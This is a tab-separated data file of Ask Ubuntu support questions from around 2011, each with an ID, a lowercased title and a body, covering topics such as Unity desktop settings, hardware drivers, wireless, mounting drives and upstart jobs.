36661	slow download speed but high surfing speed	i have been using ubuntu 10 since last many months and for the first time since last few days , the downloading speed has reduced to 15 kbps instead of standard 150 kbps . but my surfing speed and installation/update speed are pretty much fine . its only when i use torrent download i am facing such problem . tata photon plus avg . d/l speed as per plan 3.1 mbds actual 1.9 mbps at present speed 15 kbps ! ! ! ! but normal surfing speed . hence please let me know how can i again equal the downloading speed to that of surfing speed ... ... .
36662	is it possible to remove shadows behind windows and menus ?	is it possible to remove shadows behind windows and menus in ubuntu 11.04 with unity ?
36663	how to make the disk utility ask for password before making modifications ?	currently , i can right click any drive that is attached to the system and click format . no password is asked at all while the data is wiped . i can also format any drive from the disk utility . this brings back scary memories of windows -- how can i make it ask for a password ?
36668	extracting from a tar file - default behavior : overwrite or keep ?	in the documentation , i read that tar has the following options when extracting files from a tarball : -k , -- keep-old-files do n't replace existing files when extracting -- overwrite overwrite existing files when extracting which one is used by default ?
36671	how do i pre-install ubuntu for someone ( oem install ) ?	i would like to pre-install ubuntu on a computer for someone . i may want to customize it for them , but in the end they need to be able to choose a username , password , etc . when they first boot it up . ( also called an oem install ) . how do i do this ?
36675	how to install cinnamon desktop environment on top of ubuntu ?	pardon my ignorance , but i 'm relatively new to linux and unable to find a sufficient answer to this question elsewhere . i 'm looking to install the linux mint environment on top of ubuntu , preferably with the option of switching between the normal ubuntu gnome environment and mint ( like you would switch between gnome and kde ) . two questions : is this even possible ? if so , what 's the easiest way to go about this ? thanks in advance ! update : turns out when i asked this question i did n't know how to ask it correctly . what i wanted was not all of linux mint but rather just the cinnamon desktop environment . the cinnamon desktop environment used in linux mint can be installed with ubuntu using the following command : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable & & sudo apt-get update & & sudo apt-get install cinnamon nemo hopefully this helps anyone who comes to this question looking for how to install the mint desktop environment on top of ubuntu .
36679	how to reorder tray icons ?	using 11.04 beta . i see that you can no longer right-click and unlock|move tray icons . is there a way to actually re-order these ?
36682	a bug has a `` fix committed '' status . why am i still experiencing it ?	the bug says `` fix committed '' , but where is the fix ? i have the same problem with my microphone it still does n't work on my asus eeepc 1215 laptop .
36684	is it possible to have more than 4 desktops in unity ?	i currently use 6 desktops and i would like to continue to do so . i 've tried unity , but by default it has only 4 and navigation between them is clunky at best . gnome 3 has a linear navigation scheme between desktops , but in unity one must either go left/right or up/down and there does n't appear to be any way of knowing which desktop one is on and which direction one needs to go . in my view , the multiple desktop scheme in unity is very poorly designed and unecessarily limits users to the default settings . is it possible to change the default settings ?
36687	boot into recovery console	i found out that since my brand new alienware m17xr3 laptop is running intel sandy bridge , i have two options to get it to work : run 11.04 which has experimental sandy bridge support in the kernel disable nvidia optimus if i want to use nvidia driver option 2 is not possible because there is no option in the bios even though i have already updated to the latest version from dell 's support site . thus , it comes to my question : my attempt to install 11.04 works until i have to reboot . after which all i see is a brief image of the ubuntu logo with 5 dots . then , the screen keeps flickering like crazy with different colors . how do i boot up my ubuntu with a barebone , no frill so i can keep running apt-get upgrade every couple of days ?
36696	foxit reader on wine runs but does not install ?	i am new to ubuntu ( from windows ) . i tried installing foxit reader via wine , the setup runs , but its more like just a splash screen then foxit is open . when i try to open another pdf by double clicking , it says `` file not found '' . under applications > wine > programs theres not foxit . have foxit installed incorrectly ?
36700	why does my transmission client tell me my tracker list contains invalid urls ?	when i type in custom trackers into the tracker list , and try to save the list i get a message saying : list contains invalid urls am i doing something wrong ?
36702	unable to control volume using keyboard button on dell inspiron n5010	after recent update i am not able to change the volume using the keyboard button . it used to work fine earlier but not anymore . all other buttons ( play/pause , brightness , wireless-enable/disable etc ) work fine . moreover there is speaker in the notification area . it used to be there before . in system- > preferences , there is no option to control sound preferences . thanks
36703	network interfaces do not function when ubuntu is installed on an asus 'striker extreme ' motherboard	i am attempting to install ubuntu server 10.04 lts on my computer . this computer is based around an asus 'striker extreme ' motherboard . i can install ubuntu , but the machine can not connect to the network . the installer and modprobe both claim to recognize the network interfaces of the motherboard , but there is no network connectivity . when the machine 's interfaces are configured to use dhcp , they claim to be sending out dhcpdiscover messages , but looking at the log on my dhcp server , i see no dhcpdiscover messages received and no dhcpoffer messages sent out . when the machine 's interfaces are configured to use static ip addresses , they ca n't communicate with the rest of the network . i tested the cable separately : it works . i tested with different dhcp servers : no change . i tested with a different switch : no change . when i use google to seek an answer to this problem , i end up with answers like this one on the ubuntu forums or like this one elsewhere on the same forum , which are dated advice and which do n't work for me : i can go through the steps of telling modprobe to do something different , but this does not solve the problem and the symptoms that i am experiencing do not change . how can i get this machine connected to my network ?
36704	what do you do when ubuntu hangs/lags ? ctrl+alt+del ?	generally , i think linux should be stable ? but recently , my ubuntu was hanging or lagging . mouse moves but not responding to clicks . on windows , i would use ctrl+alt+del and stop any unresponsive apss . i wonder if theres a replacement in ubuntu for ctrl+alt+del ? or what will u do when ubuntu hangs ?
36706	how can i make the window buttons in the panel match the window buttons in the window decorations ?	when the ambiance gtk theme is selected in applications ▸ appearance ▸ customize ▸ controls , the window buttons in the panel match the window buttons of the ambiance metacity theme 's window decorations : when i choose any other gtk theme ( e.g . dust ) in applications ▸ appearance ▸ customize ▸ controls , the window buttons in the panel change to something i do not recognize : these strange , off-center window buttons are inconsistent with the current window decorations ( ambiance ) : how can i either switch back to the ambiance-compatible window buttons in the panel while still using non-ambiance controls , or alter the images that unity uses to make the strange , off-center window buttons ?
36709	my computer doesnt support unity ?	i was told that my pc doesnt support unity on install of ubuntu 11 . its intel c2d t9300 2.5 ghz 4gb ddr2 320gb hdd nvidia geforce 8600mgt does it support unity , if so , how can i enable unity . its currently using the ubuntu 10 theme thingy : ) thanks
36710	why is a restart only required on some updates ?	why does n't ubuntu require restarts on more updates ? i know that for kernel updates and things like video drivers , it ca n't load the changes without a restart . but i 'm curious about more basic updates of pretty fundamental packages that often do n't require restarts . things like telepathy , glibc , gtk , etc . why do n't packages like this require a restart to be updated ? is the new version actually running right after an update ? another example would be gwibber . i recently received and update to gwibber via the update manager while gwibber was running . the update completed successfully . would gwibber be running the new version without manually restarting it ? and is that the same for other packages ? ( i know some like mysql and apache automatically restart on an update ) . for packages that do n't automatically restart , ca n't that be somewhat of a security issue for security fix ? this comes up because i have been running os x for about a week and almost every update requires a restart even if it is n't kernel/video driver related ( as far as i can tell - they do n't give you a lot of information ) . a friend of mine said that apple forces restarts on most updates `` just in case '' it would be weird if you did n't restart . windows is the worst because almost any install/uninstall or update requires a restart ( often forcing shutdowns to take a very long time ) . this may be a bit broad for this venue , but why do the different operating systems handle this so differently ? or , more specific to ubuntu : why does n't ubuntu follow a more strict restart policy ?
36711	how do i launch the `` smb browser '' and point it to a windows print share ?	i need to know if launching ubuntu 's `` smb browser '' program ( pictured below ) and pointing it at a windows print server is possible . i tried using ps aux to get an idea of what program is being used behind the scenes , but i could n't find it , although i think its probably the gnome cups print configuration app , since you can get to it from system - > administration - > printing . i 'm preparing a laptop image where users will need to be able to select a shortcut that takes them to the windows print server and lets them select a printer in a ( relatively ) user-friendly way like windows does . i 'd like to know if that is possible with smb browser . failing that , i 'd like to know if there are any alternatives .
36714	how can i change the user during a bash script execution ?	i have written a bash script from which i execute it from the root . i want to execute a particular command in a user account rather than root account.so how to execute that command in a user account and not in root account.for example i want to execute this command echo 'user_pref ( `` toolkit.networkmanager.disable '' , true ) ; ' > > ~/.mozilla/firefox/*.default/prefs.js` in a user account say karthick how to execute it ?
36715	how to set a vnc password ?	can anyone say me how to set a vnc password in ubuntu ? such that if anyone access my machine through vnc it should prompt for a password .
36716	how to transfer a file from one system to another system in a single command ?	how to transfer a file from one system to another system easily ? in my company employees will always ask us to transfer files from one system a to system b and so on . what we do is first we access system a through samba and copy the required files and then we access the system b through samba and paste the files there.is there any easy and quick way of transferring of files from one system to another system ? any gui will be preferable , thanks in advance : )
36718	how to - view sound percentage ?	is there a way to make ubuntu show me the current main volume level in the form of a percent ? like windows 7 does when you change the sound level . i 'm just sorta a number freak , and i like to know what percentage my volume is at . thanks : )
36719	banshee crashes at startup	whenever i launch banshee , it loads the window and i can see it for 1-2 seconds before crashing without displaying any errors . i 've tried uninstalling and installing via the banshee ppa with no luck . it was working before i rebooted my computer . it 's not a corrupted db or anything as i 've renamed my old db and it still does the same thing . any ideas ?
36722	to mount nas on a laptop ?	so , i bought a nas , which i configured successfully in /etc/fstab , on mu kubuntu 10.10 thinkpad x40 . it works just fine when i am at home . a few days i went out with my laptop and the problem is , that when not at home , both suspend and hibernate functions seem forever to work . i commented out the entry on fstab and the laptop started to work as expected . i played with autofs , but it seems just dies at one moment and i can not access anything . it works for some time , and then just goes off . is there any consistent way , to make my laptop access the drive when at home and work ok when away ? probably a script that runs at startup , checks if the mount is there and mounts it if available ... or a script that umount the drive at suspend|hibernate and loads it back at startup . any useful ideas ?
36723	blurry vertical sections using fglrx with radeon hd 6970	so i managed to get fglrx working by downloading the drivers from ati because the ones from additional drivers boot to a black screen and the open source dont let me change resolution . my one issue is that half of my monitor is fine and the other half is blurry almost as if there 's a blurry vertical stripe on the right side . i tried disabling compiz and have the same issue in both gnome and kde , i was wondering if theres an xorg.conf change that could be made to fix this as i have already set the resolution and refresh rates to the correct values .
36726	do not start bluetooth automaticaly . how to do that ?	i want that my bluetooth by defautl be turned off . how can i do that ? ubuntu 10.10
36734	what happened to the ubuntu weekly newsletter ?	i just noticed that no new `` weekly '' newsletter has been released since january , and i ca n't seem to find any information on why the newsletter has been put on hold for this long . does anyone know more ?
36735	how to check if a user is logged in ?	how do i check from within a php script , if a user is logged in ? my current way is , to get the output of w | grep < username > and check , if there is output . it works , if a user is logged in via gdm , kdm or ssh or login on a tty . but what it does n't get is , if an other user opened a terminal and run su < username > , this shell process is not reported , how do i get this ?
36736	`` desktop effects could not be enabled '' in vmware	i am running on a windows 7 64 bit host . i 'm use with vmware player . ubuntu 10.10 . and , i get to visual effect , and when i press `` normal '' i get this error : desktop effects could not be enabled and if i press : compiz : compiz ( core ) - fatal : software rendering detected . compiz ( core ) - error : failed to manage screen : 0 compiz ( core ) - fatal : no manageable screens found on display :0.0 what i can to do ?
36751	how to activate super+scroll to zoom ?	in maverick , and i belive many old ubuntus , one could zoom in and out by holding super and scrolling with the mouse , but that does n't work in natty . how do you activate that again ?
36754	batch image crop to 6x4	i have a bunch of images which are not 6x4 images . how can i crop all the images to 6x4 and keep to the best quality possible at the same time ?
36760	alternative to ubuntu one music store ( non-us )	while i love the ubuntu one music store , it does n't really have a lot of artists i like in it . so is there any alternative store ( other than jamendo and magnatune , i 'm looking for something more `` mainstream '' ) that works on ubuntu for non-us users ( eg : amazon mp3 is not an option , since it 's us only ) ? i would love to be able to actually buy my music rather than illegally downloading it from the internet , but so far i failed to find a real alternative . buying cds in online stores and having them shipped to me is n't an alternative for me either . and options that require wine/crossover are out of question too . so , how can i get my favorite music legally on ubuntu ?
36765	how to make adobe air audio work ?	does anyone have any idea on how to make air adobe work on a 64-bit ubuntu ? if i try to install the .bin version from the adobe site , the application using adobe air works fine but there 's no sound ! thank you .
36767	apt-mirror monitoring how to ?	we have created a local ubuntu repository using apt-mirror and i must say it has been awesome . but now one issue that we are facing is that we need to monitor which version of ubuntu is being accessed more for packages , which packages are being downloaded more and all sort of things . it would be great if someone could show us the way or just tell us how could we set up a monitoring for apt-mirror .
36770	how to remove show passwords option in thunderbird preference ?	i used to store passwords in thunderbird . but any one can see my password by clicking show passwords in thunderbird preference . is it possible to remove show passwords option from thunderbird preference ? or is there any other way to protect my thunderbird account ? i dont want to enter my password everytime , that is why i am searching some other way..
36772	how to setup a domain server ?	i would like to manage more than 200 ubuntu pc 's . so i have a plan to setup a domain server.can some one explain me on setting up a ubuntu domain server ?
36774	how to have a way to quickly change programs in unity ?	i just have unity running today , i like the way it hides stuff to increase screen space . also , i like the new workspace switcher and applications `` app '' . but i now find it hard to switch apps . alt tab seems slower than click if i have more than afew tabs running can i somehow lock the `` dock '' , maybe at the bottom , and make it smaller , something like windows 7 taskbar ? i hope this is not a duplicate , i tried searching , but may have searched for the wrong terms , since i am new to ubuntu
36785	tail - how to quit tail and restore terminal window ?	let 's say we do : tail -f /var/log/apache2/error.log then we see what we want to see , and then , we want to quit , so that we can navigate to other directories and so on ... so , the question is : how can we quit tail ? i 've tried to type : 'q ' , and 'exit ' , and 'quit ' , and 'kill ' , no luck .
36790	where is the countdown timer image for ubuntu 11.04	i have been looking in ubuntu.com for the countdown timer to put in my website with no luck . where is it since it is days left from release .
36791	home launcher disappeared , how do i get it back ?	after doing this , my home launcher disappeared and i can not get it back on the panel . i changed file back on the original , but still can not get it back . is there something else i need to check ?
36797	how do i get c++ to work with code : blocks ?	i installed code blocks , selected a gnu/gcc compiler , and created a new empty project and file . when i try to execute a basic hello world program , no console window pops up and no errors are generated .
36799	weird logout , system freeze and restart problem	i am having this weird problem where my system will either restart all of a sudden or just freeze . sometimes it just gets me logged out of ubuntu and i have to login again . not sure if its related , but sometimes programs crash too . chrome ( can be becuause of dev version ) , skype etc . are there any logs which i can check what happened or if something crashed/failed . any tests that i should try running ? memtest or some hdd related perhaps ? p.s . i am running 10.10 edit : the issue has become more serious now . i just faced the issue 10+ times in the last 15 minutes . twice it got hang and other times i got logged out for no reason . when the system got hang this time , i saw that caps lock & scroll lock were blinking . could it be because of some programs ?
36801	how to mount fakeraid to /home of a new system ?	i 'd like to know how to re-mount the fakeraid disk to the new system safely so that i wo n't losing my data . i 'm going to install ubunto10.10 to root my old computer setting : 1 320g disk for / 2 500g disks for /home , using fakeraid raid1 and my new computer setting : 1 new 500g disk for / 2 500g disks for /home , using fakeraid raid1 ( the same ones from the old computer ) when should i mount /home ? before or after installing ubuntu ? should i install raid driver or the ubuntu 10.10 will support fakeraid automatically ? this is my first time to recover a raid system , so please please help me , thanks ! !
36802	booting takes a long time	i have an emachine 1200el with ubuntu 10.10 installed . when i start my computer , i get a black screen with a blinking dash for about 30 seconds before i can log in . after another 30 seconds it runs well . how can i have my computer start without this delay ? i 'm a novice .
36804	headphone do n't work	alright , i 've read just about every thread on the internet for this , but i ca n't seem to get it working , and i 'm at my wits end . i 've got a laptop , a dell inspiron b130 running kubuntu ( which /etc/issue claims is 10.04.2 , but i have fully upgraded at this point ) , and up until a couple weeks ago , the headphones worked just fine . you 'd plug them in , and the speakers would shut off , and the headphones would turn on . you 'd pull them out , and the speakers would turn back on . then , one day , i plugged the headphones in , and the speakers shut off , but the headphones would not turn on . i tried following the instructions on hdaintelsoundhowto : user @ computer : ~ $ cat /proc/asound/card0/codec # * | grep codec codec : sigmatel stac9200 codec : conexant id 2bfa user @ computer : ~ $ lspci | grep audio 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) ... and tried every 'dell ' option under stac9200 in the hd-audio-models list , along with 'auto ' , in my /etc/modprobe.d/alsa-base.conf ( i.e. , options snd-hda-intel model=dell-m21 , etc. ) . after each one , my headphones would work once . the next time i unplugged them , they would never work again , until i tried a new model ( going back to a previous one would n't work ) . then , i ran out of models , and my headphones stopped working . figuring that maybe i needed an upgrade , i tried that , and they worked again - one last time . now , i 'm stuck , and i have no idea where else to turn .
36807	automatically mount encrypted directory , other than home , on login	i finally managed to figure out how to mount an ecryptfs encrypted directory ( my old home directory ) i would like to have it mounted automatically when i login , the same way my home directory gets mounted .
36809	where can i give feedback on ubuntu ?	i 'm running ubuntu 11.04 beta 2 . is there a way , or a place , to give feedback on this system ? not file bugs , just give feedback .
36813	why is my theme switching to the classic and back again ?	okay so my ubuntu 10.10 32-bit desktop ( moments after logging in ) will revert back to the `` classic '' gray gnome theme . this is an easy but annoying fix , since i can ( constantly : p ) just open appearance and it will change back , automatically . but even after that nautilis and desktop-right click are still old and gray looking . is there a fix to this problem ; this is getting very annoying . ( note : also , my icons are affected as well : ( )
36815	deactivate compiz for a single window	i would like to deactivate compiz for a single window . is this possible ?
36820	how to make youtube fullscreen actually fullscreen ?	whenever ( using flash ) i make youtube videos fullscreen then they come out not actually any bigger . in the screenshot below you see exactly what i see when watching a video in fullscreen mode . all the black space should n't be there ( i think ) . i do n't see this problem in other sites , for example bbc iplayer . is this standard youtube behaviour , common on youtube , or is it just me ? any suggestions on fixing it ?
36821	how enable tab-completion in dash to run commands ?	in stardard gnome when i do alt+f2 i can complete paths and commands with tab but now in unity the focus moves down to choose something else . is there any way to enable this feature ?
36829	udf dvd mount issues in maverick	when i insert the dvd into my drive i see it mounts , but i can not access it unless i am root . doing ls -l on the mount i get no access permissions : $ pwd /media $ ls -l d -- -- -- -- - 4 haimov haimov 136 2011-05-06 05:22 udf volume what can be the problem ?
36836	my permissions are messed up	i recently just installed the gnome3 d.e . on ubuntu 11.04 after and once i did all my permissions got messed up . it wo n't let me open dropbox and says it 's because of a permissions error . also when i try to change the theme folder in gnome-shell it wo n't let me because of the same reason .
36838	macbook 2,1 - everything works except wireless !	so i 've been running ubuntu through a vm for a while , and finally decided to run it natively through bootcamp , so i installed it , and the installation went fine . as far as i can tell , everything works fine , except the wireless internet connection . if i use an ethernet cord directly , it works fine . if i try and connect wirelessly , it prompts me for the network password , then it does the scanning thing for about 30 seconds , and then the prompt comes back up . if i enter the password , and then while it 's scanning , i click the network , a box comes up that says `` wiress network disconnected '' , and then it resumes scanning . the weird thing is , it has successfully connected before , but it 's very sporadic ( takes a while to connect , but stays connected ) , and i have n't been able to replicate settings that makes it connect . everything works fine in osx . wireless settings : ssid : linksys mode : infrastructure bssid : 00:25:9c:45:5d : f6 device mac address : cloned mac address : mtu : automatic wireless security security : wpa & wpa2 personal ( my router uses wpa personal ) ipv4 settings method : automatic ( dhcp ) everything is blank/unchecked ipv6 settings method : ignore any help is greatly appreciated .
36840	how to see all available `man` manuals ?	how do i tell man to show me a list of all the 'manuals ' installed on my ubuntu 10.10 system ? also , is there a specific directory where the manual pages are installed ?
36841	what is a good starter ubuntu book ?	what is a up-to-date good book that talks about general usage of ubuntu or linux in general ( but that applies to ubuntu as well ) ? things like : what are the common commands ( man , ls , etc . ) basics of bash ( including redirection , piping etc . ) where files are generally installed ( eg . what is difference between /usr/lib and /usr/local/lib ; when we to make for a lib like libpng , where does it get installed ) i suppose i want to find some book that is a good starting point for understanding the linux system/environment .
36842	picking a torrent application for a server	i 'd like to configure my headless ubuntu server ( 64bit ) to download and seed torrent files . i 'm looking for an application with the following requirements ( in order of importance ) : easily work with openvpn let me select individual files in a torrent . good command line interface a web ui to connect to from the local network . ease of setup i 've been looking at these forums and it seems rtorrent , deluge , and transmission are the most popular and all three seem to support the above . is this correct ? what about the alpha version of the utorrent ? any general tips about diving into this ? thanks for your input !
36845	updating ufw ( uncomplicated firewall ) does n't affect existing connections	can anyone tell me whether or not new or updated rules made to ubuntu ( v10.10 ) ufw should affect existing connections ? i have noticed that these only take effect the next time i try to reconnect , which does n't seem to me the way a firewall should behave ! what i 'm trying to achieve here is to simulate a connection being lost/dropped in a socket based client . is there any way to update these rules immediately so as they affect existing connection ?
36848	force application to only be able to save files in a specific folder	i want to force an application ( like gedit ) so that it can only save files in one specific folder ( like ~/bla ) . sort of like a prison where you can only save files . i already thought about modifying gtk 's source to force it , or using openroot .
36850	is there a functioning wifi tool ( not network manager ) that works on public wifi and supports vpn ?	i have never managed to get network manager to work on any machine i have installed it on . five machines desktops , laptops , netbooks and a tablet . wicd always works perfectly but wicd does not support public wifi or vpn . is there a tool that allows vpn access and public wifi use on ubuntu ?
36855	upstart pre-stop killed during shutdown	i 'm running ubuntu server , hosting a virtual machine using an upstart job . i 've got it launching on startup , and shutting down the host on exit , but i ca n't seem to get it to suspend when the host shuts down . if i use initctl stop vmservice , then the suspend happens correctly - but if i shutdown -h now or reboot , it looks like it 's just getting killed ( i tried putting a sleep in the pre-stop script , and that behaves the same way ) . any help would be appreciated . i 'm rather new to upstart , so i 'd appreciate any other feedback , too ( including , am i doing the `` right '' thing by calling shutdown in a post-stop ? ) . my job ( the 'start on ' was snagged from kdm.conf ; .startvm and .stopvm just start and suspend the vm ) : start on ( filesystem and started dbus and ( graphics-device-added fb0 primary_device_for_display=1 or drm-device-added card0 primary_device_for_display=1 or stopped udevtrigger ) ) stop on runlevel [ 016 ] pre-stop script exec su -c `` /home/unprivileged_user/.stopvm '' - unprivileged_user end script env xorgconfig=/etc/x11/xorg.conf exec su -c `` xinit /home/unprivileged_user/.startvm -- /etc/x11/xinit/xserverrc :0 '' - unprivileged_user post-stop script shutdown -h now end script
36857	run script after automounting usb hdd ( udev , mount -- bind )	when plugging-in my usb hdd , it is mounted automatically , as expected . after that event , i 'd like to automatically mount a specific folder on the usb device . therefore , i wrote a udev rule containing run+= '' path_to_script and a script containing mount -- bind /media/device/folder mount_directory . the problem is that the usb hdd is n't mounted before the script has not finished . thus , of course it 's impossible for the script to work properly : the hdd has to be mounted first , then the script has to be run . i tried it then with a two script solution . the script executed by udev contains script2 & exit and the second script contains sleep 10 ; mount -- bind ... . however , that does n't work either . maybe here it 's a problem with permissions ? with sudo it also fails . ( udev rule is working and script is working when i run it manually ( with sudo , of course ) . ) . can someone help me on this issue ? how to run the script correctly after automounting ? or is there another solution ? by the way , it 's working when the whole device is also mounted by the script executed by udev : mount /dev/sdb1/ /media/xyz ; mount -- bind ... but i preferred another solution , if possible .
36862	ubuntu not booting with a missing /sbin/init	linux/ubuntu noob here and my installation just choked with the /sbin/init error . this is similar to this previous issue : days-old but wo n't boot ( missing /sbin/init ) - help ! and this link describes the apparent solution . i have a dual boot eepc 1001px , my partitions are a little different , fdisk -l gives me : /dev/sda1 * id=7 hpfs/nffs /dev/sda2 id=lb hidden w95 fat32 /dev/sda3 id=5 extended /dev/sda4 id=ef efi ( fat-12/16/32 ) /dev/sda5 id=83 linux i 'm using a bootable usb key with the netbook 10.10 version installed so i can get into ubuntu that way for diagnostics . i tried the sudo fsck /dev/sda5 as mentioned in the second link to attempt a repair however i get the following error : fsck.ext4 : device or resource busy while trying to open /dev/sda5 filesystem mounted or opened exclusively by another program ? and i 've no idea what to do next : (
36863	how do i add and force the screen resolution on an hdmi output ?	i been trying to add a new resolution for my tv using xrandr , but this new resolution does n't show in monitors , also when i try to force it my screen just goes black . windows correctly detects all the supported modes , while ubuntu does n't , why ? , also how do i add a new screen resolution so i can use it without my screen just turning black ? .
36867	what does banshee need to recognize an audio book ?	i do have a few audio books , but banshee does n't recognize them . what prerequisites have the files to meet to be recognized by banshee as an audio book ? is it a one or more mp3 tags or a special format ? i put all files in a seperate folder and set the location in banshee correctly . please help if you can . ; )
36869	how do i recreate my ubuntu account ?	i ran sudo apt-get remove wine* and it removed my account . when i try to log in a nivida screen flashes ( that 's normal ) and then i 'm back at the log in screen . what can i do ? i have files that i do n't want to waste , i could get them bakup if i could log into the computer . well wine is gone so the command worked in a way ( what did it do ? ) . can i create a new admin with the usb or a new account ? it 's really annoying this .
36874	would i benefit from reducing , or increasing swappiness ?	i 've read a few articles now about changing the swappiness level on ubuntu to possibly increase performance . but i 'm very unfamiliar with how swappiness works , would i benefit from increasing , or reducing it ? i have 6gb of ddr2 .
36877	pgp keyservers : creating personal keyserver	is it possible to create your own pgp keyserver on ubuntu to host pgp keys ?
36883	desktop not appearing after upgrade to 10.10	i just assembled a computer from store bought pieces with the intention of putting ubuntu 10.10 on it . in hindsight , i probably should have just burned a 10.10 cd and installed from that , but i installed from a 10.04 cd and used the upgrade manager to upgrade it . before and during the upgrade , everything ran smoothly . i got to the end and it said please restart to complete the upgrade . i did , and when it booted back up , it went straight to the console login ! any ideas what may have happened and how i can fix it ? bash is nice and all , but i want my desktop back !
36884	can and should i try enabling the config_inotify kernel configuration option ?	powertop just offered the following suggestion : suggestion : enable the config_inotify kernel configuration option . this option allows programs to wait for changes in files and directories instead of having to poll for these changes it it worth pursuing this ? how would i do it ?
36893	can i install lamp and some ide on my usb device ?	actually i am using a shared pc , and i want to know , if there is a way that i can install applications on my pen drive or external hard . like lmap , netbeans and some other for the web development . or are there other ways to keep my data safe if someone scans the pc for what i am doing . it is a sort of secret operation : ) all suggestions and solutions will be very help full . thanks .
36894	how can i automatically set my status to available when i log in ?	this is the first thing i do after logging in : how can i make it happen automatically ?
36898	how can i see a list of all the systray icons that are not whitelisted ?	i 've learned that unity does not support systray icons , and that it is possible to grant exceptions for ( whitelist ) certain applications . as far as i can tell , there is no general error message displayed when an application is denied an attempt to display unsupported systray icon . how can i find out what applications are being denied ?
36901	acer aspire 5742 hdd activity pilot light is always on when i insert a sd card	ubuntu 11.04 : on acer aspire 5742 the hdd activity pilot light is working properly , but when i insert a sd card into the laptop slot , then this hdd pilot light is always on ... is this normal ?
36902	ubuntu one windows crashs when opening preferences	ubuntu one on windows keeps on crashing every time i try to open the preferences window . i tried re-installing many times and still crashes . is there a fix for this ?
36905	no wireless with dell inspiron 1501	i have a dell 1501 inspiron laptop and i just upgraded to ubuntu 11.04 . however , now my wireless card does n't work whereas it worked just fine in 10.10 and 10.04 . any ideas ? it works fine when i hardwire .
36908	numpty physics : fullscreen ? additional levels in a .deb ?	i recently discovered numpty physics , possibly the best game ever in the history of the world ... or close to that : ) http : //numptyphysics.garage.maemo.org/ anyway , i have two questions : can i put the game in fullscreen ? i have noticed that the windows port has other levels , possibly more than the ubuntu package in the repositories . any idea how i can get more levels in a .deb or a repository ? i am thinking about deploying it eventually in a school , and it would be better to have nice packages .
36910	how to remap keyboard shortcuts in unity launcher ?	i am aware of how to change the shortcut to focus the launcher with compiz settings manager , so this is a different question from can i define keyboard shortcuts using the super key ? my default installation ( 11.04 ) has assigned 'super + 2 ' to firefox and 'super + 3 ' to chrome . i would like to assign super + f to firefox and super + c to chrome . how can i do it ?
36911	how to install new nvidia linux driver supports ubuntu 11.04 series 270.41.06 ?	my friends tell to me about new nvidia linux driver and can supports ubuntu 11.04 , but i ca n't install on my ubuntu right now because the extensions it 's different ( .run ) not ( .deb ) . i 'm so confuse about that , would you like to answers this ? thanks masters !
36912	floppy drive not recognised	i am a newbie with ubuntu during the past two weeks , and i believe , that i have made good progress so far . current setup tasks are completed , like : `` wireless network , printer , thunderbird + firefox , e-mail '' , also my local weather station - all setup . updated files and rearranged the desktop to my liking . the problem i have now is my floppy drive which is not recognized , but the activity light is shown on constantly . i have downloaded the `` makefloppydriveavailabletoeveryone '' and i am confident that i can follow the instructions to change the floppy drive . however , i do not have an existing fd0 file in /dev/ ? ? ? , but only /dev/fd/ files 0 to 46 . please advise .
36914	how can i improve resume performance ?	i have an eee pc 1005hg running natty with unity 2d . the drive is an intel x-25v and i 've shovelled everything i can into ram ( eg : /tmp ) . resume performance still seems pretty sluggish . home is encrypted . anything i can do , or is this largely down to the hardware ?
36925	close laptop cover	i have laptop and connected display . now i set up my ubuntu , that laptop display off , only connected display on . how can i set my ubuntu , that it not respond , when i close cover ? i want it , because i work only with connected display , and do n't need laptop display on this basis i want close my laptop cover .
36930	is a nvidia geforce with optimus technology supported by ubuntu ?	i am considering buying a dell xps 15 laptop . the laptop has a nvidia 420m card which should work with linux but i keep reading that the nvidia optimus technology is n't supported on linux . i am not really interested in switching from nvidia to intel to save power but need to know that the nvidia card will in fact work if i installed ubuntu . if anyone has experience using a nvidia card with optimus technology or even better the exact laptop in question ( dell xps 15 with 1gb nvidia® geforce® gt 420m ) it would be great . a major problem holding people back from adopting linux is this sort of hardware issue . i am a long term ubuntu user and supporter who ca n't afford to make a mistake with a purchase like this . i do n't want to spend £500+ to find i have no graphics acceleration because windows 7 is not an option .
36935	is there a vrml2 ( vrml97 / wrl ) viewer ?	is there a vrml2 ( vrml97 ) viewer that works out of the box for ubuntu ? i 've heard about g3dviewer ( no support for vrml2 ) , and also about freewrl , whitedune and vrmlviewer - but i can not find any .debs of these , and it seems their building from source is rather involved . blender can import these files - but i 'd want a quick viewer here ; if i have a directory with 4-5 wrl files , i have to import each in blender , then delete everything from blender so i can load and display the next one . any suggestions ?
36938	how do i share my nic which has internet connectivity with another nic ?	on my main computer , i have one interface eth0 which uses dhcp to obtain an ip address , dns addresses and it 's gateway ip address . it has successful connectivity to the internet . i have another interface eth1 which uses a static ip address which provides nfs services to another computer , let 's call this other computer nfs-client . i want nfs-client to be able to have internet connectivity also ! however i do not want to join it to the same network as eth0 . here is a simple diagram : + -- -- -- -- -- -+ + -- -- -- -- -- -+ + -- -- -- -- -- -+ | | |ubuntu | | | |adsl router| -- -- -- -- -- -- -|computer | -- -- -- -- -- -- -|nfs client | | | | ( 2 nics ) | | | | | | | | | + -- -- -- -- -- -+ + -- -- -- -- -- -+ + -- -- -- -- -- -+ . i simply want to keep my network topology and give nfs-client internet connectivity via the main computer . how do i go about doing this ?
36941	make updatedb ignore dot-paths	anyone know how to make updatedb ignore 'hidden ' paths ? this is n't any kind of security issue ; i just want updates to be faster . i 've tried using the -n and -e flags with ' . * ' to no avail .
